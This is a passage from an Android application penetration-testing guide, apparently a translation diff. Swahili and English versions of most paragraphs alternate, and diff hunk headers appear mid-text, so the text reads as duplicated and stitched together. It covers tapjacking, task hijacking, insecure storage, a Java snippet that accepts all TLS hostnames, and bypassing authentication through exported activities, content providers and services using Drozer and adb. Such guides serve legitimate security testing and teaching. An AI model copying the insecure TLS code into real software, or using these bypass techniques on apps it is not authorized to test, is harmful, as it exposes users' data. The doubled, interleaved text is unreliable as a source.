- **Debuggable Applications**: Applications zilizowekwa kama debuggable (`debuggable="true"`) katika faili _Manifest.xml_ zina hatari kwa kuwa zinaruhusu connections ambazo zinaweza kusababisha exploit. Kwa ufahamu zaidi juu ya jinsi ya exploit debuggable applications, rejea tutorial juu ya kupata na ku-exploit debuggable applications kwenye kifaa.
- **Backup Settings**: `android:allowBackup="false"` inapaswa kuwekwa wazi kwa applications zinazosimamia taarifa nyeti ili kuzuia backups zisizoidhinishwa za data kupitia adb, hasa wakati usb debugging imewezeshwa.
- **Network Security**: Mipangilio maalumu ya network security (`android:networkSecurityConfig="@xml/network_security_config"`) katika _res/xml/_ inaweza kubainisha maelezo ya usalama kama certificate pins na mipangilio ya HTTP traffic. Mfano ni kuruhusu HTTP traffic kwa domains maalum.
- **Exported Activities and Services**: Kutambua exported activities na services katika manifest kunaweza kuonyesha components zinazoweza kutumiwa vibaya. Uchambuzi zaidi wakati wa testing ya dynamic unaweza kufichua jinsi ya exploit components hizi.
- **Content Providers and FileProviders**: Content providers zilizofunuliwa zinaweza kuruhusu access au modification ya data bila idhini. Usanidi wa FileProviders pia unapaswa kuchunguzwa.
- **Broadcast Receivers and URL Schemes**: Components hizi zinaweza kutumika kwa exploitation, hasa kuzingatia jinsi URL schemes zinavyosimamiwa kwa ajili ya input vulnerabilities.
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, na `maxSdkVersion` zinaonyesha toleo za Android zinazotumika, zikionyesha umuhimu wa kuto-support outdated, vulnerable Android versions kwa sababu za usalama.
Kutoka kwenye faili ya **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer zinaweza kugunduliwa, ikisisitiza umuhimu wa kupitia kwa uangalifu rasilimali hizi.
Kutoka kwenye faili **strings.xml**, taarifa nyeti kama API keys, custom schemas, na maelezo mengine ya developer yanaweza kupatikana, ikisisitiza umuhimu wa kupitia kwa uangalifu rasilimali hizi.
### Tapjacking
**Tapjacking** ni shambulio ambapo **malicious application** inaanzishwa na **positions itself on top of a victim application**. Mara inapoifunika kwa mtazamo app ya mhusika, user interface yake imeundwa kwa njia ya kumdanganya mtumiaji aingilie nayo, wakati inapotumia ile interaction kumtumia app ya mhusika.\
Kwa ufanisi, inamficha mtumiaji kuona kwamba kweli anafanya vitendo kwenye app ya mhusika.
**Tapjacking** ni shambulio ambapo **malicious application** inaanzishwa na kujipanga juu ya application ya mwathiriwa. Mara inapoficha kimaso app ya mwathiriwa, interface yake ya mtumiaji imeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, huku ikiendelea kupitisha interaction kwa app ya mwathiriwa.\
Kwa ufanisi, inamtia doa mtumiaji kujua kuwa kwa kweli anafanya vitendo kwenye app ya mwathiriwa.
Pata taarifa zaidi katika:
Find more information in:
{{#ref}}
@ -104,82 +104,82 @@ tapjacking.md
### Task Hijacking
An **activity** yenye **`launchMode`** imewekwa kwa **`singleTask` without any `taskAffinity`** iliyotajwa inaweza kuwa nyeti kwa task Hijacking. Hii ina maana kwamba, **application** inaweza kusakinishwa na ikiwa itaanzishwa kabla ya application halisi inaweza **hijack the task of the real application** (hivyo mtumiaji atakuwa akiingiliana na **malicious application thinking he is using the real one**).
Activity yenye `launchMode` imewekwa `singleTask` bila `taskAffinity` yoyote imeelezwa kuwa inakabiliwa na task Hijacking. Hii inamaanisha, that application inaweza kusanikishwa na ikiwa itaanzishwa kabla ya application halisi inaweza hijack task ya application halisi (kwa hivyo mtumiaji ataingiliana na **malicious application** akidhani anatumia ile halisi).
Taarifa zaidi katika:
More info in:
{{#ref}}
android-task-hijacking.md
{{#endref}}
### Insecure data storage
### Uhifadhi wa data usio salama
**Internal Storage**
Katika Android, files **stored** katika **internal** storage zimeundwa kupatikana tu na **app** iliyozitengeneza. Kipimo hiki cha usalama kinatekelezwa na operating system ya Android na kawaida kinafaa kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers baadhi ya wakati hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu files kushirikiwa kati ya applications tofauti. Modes hizi hazizuizi access kwa files hizi na applications nyingine, zikiwemo zile zinazoweza kuwa malicious.
Kwenye Android, files zilizohifadhiwa kwenye internal storage zimedesignwa kupatikana pekee na app iliyozitengeneza. Kipimo hiki cha usalama kinafanywa na mfumo wa uendeshaji wa Android na kwa ujumla kinatosha kwa mahitaji ya usalama ya applications nyingi. Hata hivyo, developers wakati mwingine hutumia modes kama `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` kuruhusu files kushirikiwa kati ya applications tofauti. Modes hizi hazizuizi access kwa files hizo na applications nyingine, ikiwa ni pamoja na zile zinazoweza kuwa malicious.
1. **Static Analysis:**
- **Ensure** kwamba matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yamechunguzwa kwa umakini. Modes hizi zinaweza ku-expose files kwa access isiyotarajiwa au isiyoidhinishwa.
- **Hakikisha** kuwa matumizi ya `MODE_WORLD_READABLE` na `MODE_WORLD_WRITABLE` yanachunguzwa kwa makini. Modes hizi **zinaweza kufunua** files kwa access isiyokusudiwa au isiyoidhinishwa.
2. **Dynamic Analysis:**
- **Verify** permissions zilizowekwa kwenye files zilizotengenezwa na app. Hasa, **check** kama kuna files zilizowekwa kuwa readable au writable worldwide. Hii inaweza kuwa hatari kubwa kwa usalama, kwani itaruhusu **any application** iliyosakinishwa kwenye kifaa, bila kujali asili au nia yake, ku-read au ku-modify files hizi.
- **Thibitisha** permissions zilizo kwenye files zilizotengenezwa na app. Haswa, **angalia** kama kuna files zilizowekwa kuwa readable au writable kwa wote. Hii inaweza kuwa hatari kubwa ya usalama, kwani itaruhusu **application yoyote** iliyosanikishwa kwenye kifaa, bila kujali asili au nia yake, kusoma au kubadilisha files hizi.
**External Storage**
Unaposhughulikia files kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
Unaposhughulika na files kwenye external storage, kama SD Cards, tahadhari fulani zinapaswa kuchukuliwa:
1. **Accessibility**:
- Files kwenye external storage ni globally readable na writable. Hii ina maana application au mtumiaji yeyote anaweza kuweza kupata files hizi.
- Files kwenye external storage ni **globally readable and writable**. Hii inamaanisha application yoyote au mtumiaji anaweza kufikia files hizi.
2. **Security Concerns**:
- Kutokana na urahisi wa access, inapendekezwa kutohifadhi taarifa nyeti kwenye external storage.
- External storage inaweza kuondolewa au kupatikana na application yoyote, ikifanya kuwa isiyo salama.
- Kwa kuzingatia urahisi wa upatikanaji, inashauriwa **kutoweka taarifa nyeti** kwenye external storage.
- External storage inaweza kuondolewa au kufikiwa na application yoyote, ikifanya isiwe na usalama wa kutosha.
3. **Handling Data from External Storage**:
- Daima fanya input validation kwenye data inayorekebishwa kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwenye chanzo kisichoaminika.
- Kuhifadhi executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekezwi.
- Ikiwa application yako lazima irejelee executable files kutoka external storage, hakikisha files hizi zimesigned na cryptographically verified kabla ya kuzopakiwa kwa dynamic loading. Hatua hii ni muhimu kwa kudumisha integrity ya usalama wa application yako.
- Daima **fanya input validation** kwa data inayopatikana kutoka external storage. Hii ni muhimu kwa sababu data inatoka kwa chanzo kisichotegemewa.
- Kuingiza executables au class files kwenye external storage kwa ajili ya dynamic loading haipendekeziwi.
- Ikiwa application yako lazima ichukue executable files kutoka external storage, hakikisha files hizi zinasainiwa na kuthibitishwa kwa cryptography kabla ya kuzindua kwa dynamically. Hatua hii ni muhimu kwa kudumisha uadilifu wa usalama wa application yako.
External storage inaweza kupatikana katika `/storage/emulated/0` , `/sdcard` , `/mnt/sdcard`
> [!TIP]
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directories unaopunguza access kutoka app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia malicious application kupata read au write access kwa files za app nyingine.
> Kuanzia Android 4.4 (**API 17**), SD card ina muundo wa directory ambao unazuia access kutoka app hadi directory ambayo ni maalum kwa app hiyo. Hii inazuia malicious application kupata read au write access kwa files za app nyingine.
**Sensitive data stored in clear-text**
**Taarifa nyeti zilizohifadhiwa kwa clear-text**
- **Shared preferences**: Android inamruhusu kila application kuhifadhi kwa urahisi xml files katika path `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti katika clear-text katika folder hiyo.
- **Databases**: Android inamruhusu kila application kuhifadhi kwa urahisi sqlite databases katika path `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti katika clear-text katika folder hiyo.
- **Shared preferences**: Android inaruhusu kila application kuweka kwa urahisi xml files katika njia `/data/data/<packagename>/shared_prefs/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
- **Databases**: Android inaruhusu kila application kuhifadhi sqlite databases katika njia `/data/data/<packagename>/databases/` na wakati mwingine inawezekana kupata taarifa nyeti kwa clear-text katika folda hiyo.
### Broken TLS
**Accept All Certificates**
Kwa sababu fulani wakati mwingine developers wanakubali certificates zote hata kama kwa mfano hostname haifananai na mistari ya code kama ifuatayo:
Kwa sababu fulani wakati mwingine developers hukubali certificates zote hata kama kwa mfano hostname haifai na mistari ya code kama ifuatayo:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
Njia nzuri ya kujaribu hili ni kujaribu capture trafiki kwa kutumia proxy kama Burp bila kuidhinisha Burp CA ndani ya kifaa. Pia, unaweza kutengeneza kwa Burp cheti kwa hostname tofauti na kukitumia.
A good way to test this is to try to capture the traffic using some proxy like Burp without authorising Burp CA inside the device. Also, you can generate with Burp a certificate for a different hostname and use it.
### Broken Cryptography
**Mchakato duni wa Usimamizi wa Vifunguo**
**Mchakato duni wa Usimamizi wa Funguo**
Baadhi ya developers huhifadhi data nyeti kwenye local storage na kui-encrypt kwa key iliyowekwa/takikana kwenye code. Hili halipaswi kufanywa kwa kuwa reversing inaweza kumruhusu attackers kutoa taarifa za siri.
Baadhi ya developers huhifadhi data nyeti kwenye local storage na kuizificha kwa key iliyowekwa/kutabirika ndani ya code. Hii haipaswi kufanywa kwani reverse engineering inaweza kumruhusu attacker kutoa taarifa za siri.
**Use of Insecure and/or Deprecated Algorithms**
**Matumizi ya Algorithms Yasiyo Salama na/au Zilizokataliwa**
Developers hawapaswi kutumia **deprecated algorithms** kufanya uthibitisho (**checks**), **store** au **send** data. Baadhi ya algorithms hizi ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zinatumiwa kuhifadhi passwords kwa mfano, zinasuasua dhidi ya brute-force na zinapaswa kutumika pamoja na salt.
Developers hawapaswi kutumia **deprecated algorithms** kufanya ukaguzi wa **authorisation checks**, **kuhifadhi** au **kutuma** data. Baadhi ya algorithms ni: RC4, MD4, MD5, SHA1... Ikiwa **hashes** zimetumika kuhifadhi nywila kwa mfano, inapaswa kutumika hashes ambazo zinastahimili brute-force kwa kutumia salt.
### Ukaguzi mwingine
### Other checks
- Inashauriwa **obfuscate the APK** ili kufanya kazi ya reverse engineer kuwa ngumu kwa attackers.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kufanya ukaguzi wake ili kuona kama mobile ime-rooted na kuchukua hatua ipasavyo.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa kuchunguza kama **emulator** inatumika.
- Ikiwa app ni nyeti (kama apps za benki), inapaswa **check it's own integrity before executing** ili kuona kama imebadilishwa.
- Tumia [**APKiD**](https://github.com/rednaga/APKiD) kuangalia compiler/packer/obfuscator gani ilitumika kujenga APK
- It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
- If the app is sensitive (like bank apps), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
- If the app is sensitive (like bank apps), it should check if an **emulator** is being used.
- If the app is sensitive (like bank apps), it should **check it's own integrity before executing** it to check if it was modified.
- Use [**APKiD**](https://github.com/rednaga/APKiD) to check which compiler/packer/obfuscator was used to build the APK
### React Native Application
Soma ukurasa ufuatao ili ujifunze jinsi ya kufikia kwa urahisi javascript code ya React applications:
Read the following page to learn how to easily access javascript code of React applications:
{{#ref}}
@ -188,7 +188,7 @@ react-native-application.md
### Xamarin Applications
Soma ukurasa ufuatao ili ujifunze jinsi ya kufikia kwa urahisi C# code ya xamarin applications:
Read the following page to learn how to easily access C# code of a xamarin applications:
{{#ref}}
@ -197,17 +197,17 @@ Soma ukurasa ufuatao ili ujifunze jinsi ya kufikia kwa urahisi C# code ya xamari
### Superpacked Applications
Kulingana na hii [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked ni Meta algorithm inayocompress content ya application ndani ya faili moja. Blogu inazungumzia uwezekano wa kuunda app inayofungua aina hizi za apps... na njia ya haraka zaidi inayohusisha kuendesha application na kukusanya faili zilizofunguliwa kutoka filesystem.
According to this [**blog post**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) superpacked is a Meta algorithm that compress the content of an application into a single file. The blog talks about the possibility of creating an app that decompress these kind of apps... and a faster way which involves to **execute the application and gather the decompressed files from the filesystem.**
### Automated Static Code Analysis
Tool [**mariana-trench**](https://github.com/facebook/mariana-trench) inaweza kupata **vulnerabilities** kwa **scanning** **code** ya application. Tool hii ina mfululizo wa **known sources** (ambazo zinaonyesha sehemu ambapo **input** inadhibitiwa na user), **sinks** (zinazoonyesha sehemu hatari ambapo input ya mharifu inaweza kusababisha uharibifu) na **rules**. Rules hizi zinaelezea **combination** ya **sources-sinks** inayosema kuna vulnerability.
The tool [**mariana-trench**](https://github.com/facebook/mariana-trench) is capable of finding **vulnerabilities** by **scanning** the **code** of the application. This tool contains a series of **known sources** (that indicates to the tool the **places** where the **input** is **controlled by the user**), **sinks** (which indicates to the tool **dangerous** **places** where malicious user input could cause damages) and **rules**. These rules indicates the **combination** of **sources-sinks** that indicates a vulnerability.
Kwa maarifa haya, **mariana-trench will review the code and find possible vulnerabilities on it**.
With this knowledge, **mariana-trench will review the code and find possible vulnerabilities on it**.
### Secrets leaked
Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia tool kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
An application may contain secrets (API keys, passwords, hidden urls, subdomains...) inside of it that you might be able to discover. You could us a tool such as [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
### Bypass Biometric Authentication
@ -216,14 +216,14 @@ Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomain
bypass-biometric-authentication-android.md
{{#endref}}
### Vifunction vingine vinavyovutia
### Other interesting functions
- **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
- [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
### **Mbinu nyingine**
### **Other tricks**
{{#ref}}
@ -236,54 +236,54 @@ content-protocol.md
## Dynamic Analysis
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kuinstall application na mazingira yote (Burp CA cert, Drozer and Frida hasa). Kwa hivyo, kifaa kilicho-rooted (emulated au la) kinapendekezwa sana.
> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended.
### Online Dynamic analysis
Unaweza kuunda akaunti ya **free account** kwenye: [https://appetize.io/](https://appetize.io/). Jukwaa hili linakuwezesha **upload** na **execute** APKs, hivyo ni muhimu kuona jinsi apk inavyo behave.
You can create a **free account** in: [https://appetize.io/](https://appetize.io). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
Unaweza hata **kuona logs za application yako** kwenye wavuti na kuungana kupitia **adb**.
You can even **see the logs of your application** in the web and connect through **adb**.
![](<../../images/image (831).png>)
Shukrani kwa muunganisho wa ADB unaweza kutumia **Drozer** na **Frida** ndani ya emulators.
Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
### Local Dynamic Analysis
#### Using an emulator
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda **x86** na **arm** devices, na kulingana na [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** bila kuhitaji emulator ya arm ya polepole).
- Jifunze kuisanidi kwenye ukurasa huu:
- [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).
- Learn to set it up in this page:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Toleo la bure:** Personal Edition, unahitaji kuunda account. _Inashauriwa kupakua toleo **WITH**_ _**VirtualBox** ili kuepuka makosa yanayoweza kutokea._)
- [**Nox**](https://es.bignox.com) (Free, lakini haijiunga na Frida au Drozer).
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, you need to create an account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** to avoid potential errors._)
- [**Nox**](https://es.bignox.com) (Free, but it doesn't support Frida or Drozer).
> [!TIP]
> Unapotengeneza emulator mpya kwenye platform yoyote kumbuka kuwa skrini kubwa inafanya emulator kukimbia polepole. Hivyo chagua skrini ndogo pale inapowezekana.
> When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible.
Ili **install google services** (kama AppStore) katika Genymotion unahitaji kubofya kitufe kilichowekwa kwa rangi nyekundu kwenye picha ifuatayo:
To **install google services** (like AppStore) in Genymotion you need to click on the red marked button of the following image:
![](<../../images/image (277).png>)
Pia, zingatia kwamba katika **configuration of the Android VM in Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ukijiunga na Android VM kutoka VM tofauti yenye tools).
Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** (this will be useful if you will be connecting to the Android VM from a different VM with the tools).
#### Use a physical device
Unahitaji kuwasha chaguo za **debugging** na itakuwa nzuri ikiwa unaweza kui-**root**:
Unahitaji kuwezesha chaguo za **debugging** na itakuwa vizuri kama utaweza kuziroot:
1. **Settings**.
2. (FromAndroid 8.0) Chagua **System**.
3. Chagua **About phone**.
4. Bonyeza **Build number** mara 7.
5. Rudi nyuma na utapata **Developer options**.
2. (FromAndroid 8.0) Select **System**.
3. Select **About phone**.
4. Press **Build number** 7 times.
5. Go back and you will find the **Developer options**.
> Mara tu utakapo-install application, jambo la kwanza unalopaswa kufanya ni kuijaribu na kuchunguza inafanya nini, jinsi inavyofanya kazi na kuzoea kuitumia.\
> Ninapendekeza kufanya uchambuzi huu wa mwanzo wa dynamic ukitumia MobSF dynamic analysis + pidcat, hivyo tunaweza kujifunza jinsi application inavyofanya kazi wakati MobSF inachukua data nyingi za kuvutia ambazo unaweza kukagua baadaye.
> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so we will be able to **learn how the application works** while MobSF **captures** a lot of **interesting** **data** you can review later on.
Magisk/Zygisk quick notes (recommended on Pixel devices)
- Patch boot.img with the Magisk app and flash via fastboot to get systemless root
@ -291,106 +291,108 @@ Magisk/Zygisk quick notes (recommended on Pixel devices)
- Keep original boot.img to recover from OTA updates; re-patch after each OTA
- For screen mirroring, use scrcpy on the host
### Unintended Data Leakage
**Logging**
Developers wanapaswa kuwa mwangalifu kuhusu kufichua **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Tools [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kusimamia application logs ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendelewa kwa urahisi wake wa matumizi na kusomeka kwake.
Wdevelopers wanapaswa kuwa waangalifu kuhusu kufichua **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Vifaa kama [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kufuatilia logs za application ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wake na usomaji.
> [!WARNING]
> Kumbuka kuwa tangu toleo za baadaye zaidi za Android kuliko 4.0, **applications zinaweza kufikia tu logs zao wenyewe**. Hivyo applications haiwezi kufikia logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kuto-log taarifa nyeti**.
> Note that from **later newer than Android 4.0**, **applications are only able to access their own logs**. So applications cannot access other apps logs.\
> Anyway, it's still recommended to **not log sensitive information**.
**Copy/Paste Buffer Caching**
Mfumo wa **clipboard-based** wa Android unawezesha utendakazi wa copy-paste ndani ya apps, lakini una hatari kwa kuwa **applications nyingine** zinaweza **access** clipboard, na hivyo kuweza ku-expose data nyeti. Ni muhimu kuzima kazi za copy/paste kwa sehemu za app zenye data nyeti, kama taarifa za kadi za malipo, ili kuzuia data ku-leak.
Mfumo wa Android unaotegemea **clipboard** unaruhusu utendaji wa copy-paste ndani ya apps, lakini unaweka hatari kwani **apps zingine** zinaweza **access** clipboard, na hivyo kuweza ku-expose data nyeti. Ni muhimu **kuzima** vitendo vya copy/paste kwa sehemu nyeti za app, kama maelezo ya kadi za mkopo, ili kuzuia data ku-leak.
**Crash Logs**
Kama application ina **crash** na **inahifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa pale app haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka ku-log wakati wa crash, na ikiwa logs lazima zitumwe mtandaoni, hakikisha zinatumwa kupitia channel ya SSL kwa usalama.
Kama application inakufa (crash) na **kuhifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa pale ambapo application haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka logging kwenye crash, na kama logs lazima zitumwe kwenye network, hakikisha zitatumwa kwa channel ya SSL kwa usalama.
Kama pentester, **jaribu kuangalia_logs hizi**.
Kama pentester, **try to take a look to these logs**.
**Analytics Data Sent To 3rd Parties**
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo zinaweza kwa bahati mbaya ku-leak data nyeti kutokana na utekelezaji mbovu na developers. Ili kubaini uwezekano wa data ku-leak, inashauriwa ku-intercept trafiki ya application na kuangalia kama kuna taarifa nyeti zinazotumwa kwa huduma za third-party.
Applications mara nyingi huingiza services kama Google Adsense, ambazo kwa utekelezaji mbaya zinaweza kwa bahati mbaya **leak sensitive data**. Ili kubaini potential data leaks, inashauriwa **kuintercept traffic ya application** na kuangalia kama taarifa nyeti zinatumwa kwa third-party services.
### SQLite DBs
Mengi ya applications zitaitumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizohifadhiwa kwa kuwa unaweza kupata taarifa nyeti (ambazo zitakuwa vulnerability).\
Databases zinapaswa kuwa ziko katika `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** (which would be a vulnerability).\
Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
Kama database inahifadhi taarifa za siri na ime-**encrypted** lakini unaweza **find** **password** ndani ya application, bado ni **vulnerability**.
If the database is saving confidential information and is **encrypted b**ut you can **find** the **password** inside the application it's still a **vulnerability**.
Orodhesha tables kwa kutumia `.tables` na orodhesha columns za table kwa kufanya `.schema <table_name>`
Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema <table_name>`
### Drozer (Exploit Activities, Content Providers and Services)
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha kuchukua nafasi ya Android app na kuingiliana na apps nyingine. Inaweza kufanya chochote ambacho installed application inaweza kufanya, kama kutumia mfumo wa Androids Inter-Process Communication (IPC) na kuingiliana na operating system ya msingi. .\
Drozer ni tool muhimu kwa **exploit exported activities, exported services and Content Providers** kama utakavyojifunza katika sehemu zifuatazo.
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Androids Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\
Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
### Exploiting exported Activities
[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
Pia kumbuka kuwa code ya activity inaanza katika method ya **`onCreate`**.
Also remember that the code of an activity starts in the **`onCreate`** method.
**Authorisation bypass**
Wakati Activity ime-exported unaweza kuituma screen yake kutoka app ya nje. Hivyo, kama activity yenye **sensitive information** ime-**exported** unaweza **bypass** mechanisms za **authentication** ili kuipata.
When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
Unaweza pia kuanzisha exported activity kutoka adb:
You can also start an exported activity from adb:
- PackageName is com.example.demo
- Exported ActivityName is com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**NOTE**: MobSF itatambua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hili ni hatari tu kwenye toleo za zamani (API versions < 21).
**NOTE**: MobSF itakutambua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo la zamani (API versions < 21).
> [!TIP]
> Kumbuka kwamba an authorisation bypass si kila mara ni udhaifu; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zilizo wazi.
> Kumbuka kwamba authorisation bypass siyo kila wakati ni vulnerability; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonekana.
**Uvuaji wa taarifa nyeti**
**Sensitive information leakage**
**Activities zinaweza pia kurudisha matokeo**. Ikiwa utafanikiwa kupata activity iliyotolewa (exported) na isiyolindwa ikiyaita method ya **`setResult`** na **kurudisha taarifa nyeti**, kuna uvuaji wa taarifa nyeti.
**Activities can also return results**. Ikiwa utafanikiwa kupata exported na unprotected activity inayoitisha method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
#### Tapjacking
Ikiwa tapjacking haizuiliwi, unaweza kutumia vibaya activity iliyotolewa ili kumfanya **mtumiaji afanye vitendo visivyotarajiwa**. Kwa maelezo zaidi kuhusu [**nini Tapjacking — fuata kiungo**](#tapjacking).
If tapjacking isn't prevented, unaweza kudharau exported activity kufanya **user perform unexpected actions**. Kwa habari zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Kupata na kushughulikia taarifa nyeti
### Exploiting Content Providers - Kufikia na kusimamia sensitive information
[**Soma hii ikiwa unataka kukumbusha ni nini Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kawaida hutumika kwa **kushiriki data**. Ikiwa app ina content providers zinazopatikana unaweza kuwa na uwezo wa **kutoa taarifa nyeti** kutoka kwazo. Pia ni vema kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa zilizo hatarini.
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kwa kawaida hutumika kushiriki data. Ikiwa app ina content providers zinapatikana unaweza kuwa na uwezo wa **extract sensitive** data kutoka kwao. Pia ni muhimu kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vulnerable.
[**Jifunze jinsi ya kufaida Content Providers kwa kutumia Drozer.**](drozer-tutorial/index.html#content-providers)
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
### **Exploiting Services**
[**Soma hii ikiwa unataka kukumbusha ni nini Service.**](android-applications-basics.md#services)\
Kumbuka kwamba matendo ya Service huanza katika method `onStartCommand`.
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)\
Kumbuka kwamba vitendo vya Service huanza katika method `onStartCommand`.
Service kwa msingi ni kitu ambacho **kinapokea data**, **kuisindika** na **kurudisha** (au sio) jibu. Kwa hivyo, ikiwa application ina kutoa services, unapaswa **kagua** **code** ili kuelewa inafanya nini na **ijaribu** kivitendo (dynamically) ili kutoa taarifa za siri, bypassing hatua za uthibitisho...\
[**Jifunze jinsi ya kufaida Services kwa kutumia Drozer.**](drozer-tutorial/index.html#services)
Service kwa msingi ni kitu kinachoweza kupokea data, kuichakata na kurudisha (au la) response. Kwa hiyo, ikiwa application ina exporting services unapaswa kuangalia code ili kuelewa inafanya nini na kuipima kwa dynamically ili kutoa taarifa za siri, kupita vikwazo vya uthibitishaji...
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
[**Soma hii ikiwa unataka kukumbusha ni nini Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba matendo ya Broadcast Receiver huanza katika method `onReceive`.
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba vitendo vya Broadcast Receiver huanza katika method `onReceive`.
